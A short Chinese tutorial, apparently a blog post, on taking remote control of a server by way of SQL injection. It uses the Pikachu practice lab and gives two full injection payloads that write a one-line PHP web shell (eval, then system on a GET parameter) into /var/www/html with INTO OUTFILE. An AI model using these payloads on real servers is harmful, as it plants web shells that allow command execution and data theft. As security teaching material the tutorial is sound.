通过sqli进行服务器的远程控制
一句话木马:是一种短小而精悍的木马客户端,隐蔽性好,且功能强大。
利用into outfile 将select结果写入指定目录1.txt中,在没有回显注入中可以用into outfile将结果写入指定文件,然后访问获取。
通过SQL漏洞写入恶意代码
前提条件:
1、需要知道远程目录
2、需要远程目录有编写权限
3、数据库开起了secure_file_priv
首先,我们需要知道这个目录
其次,要将secure_file_priv的配置改为空,可以从配置文件中自行添加
然后,我们仍以Pikachu为例,打开字符型注入
输入:kobe’ union select"<?php @eval($_GET['test'])?>",2 into outfile"/var/www/html/1
将一句话木马加在语句中。
前端看不到什么特殊反馈,但在数据库中,已经被写入:
这是木马内容:
我们在网页中可以访问一下:
得到:
而如果想要实现命令执行
可以将代码改为kobe’ union select"<?php system($_GET['test'])?>",2 into outfile"/var/www/html/1
我们再访问一下:
得到:
这里就有许多的数据,如ip地址,网卡数据等都显露出来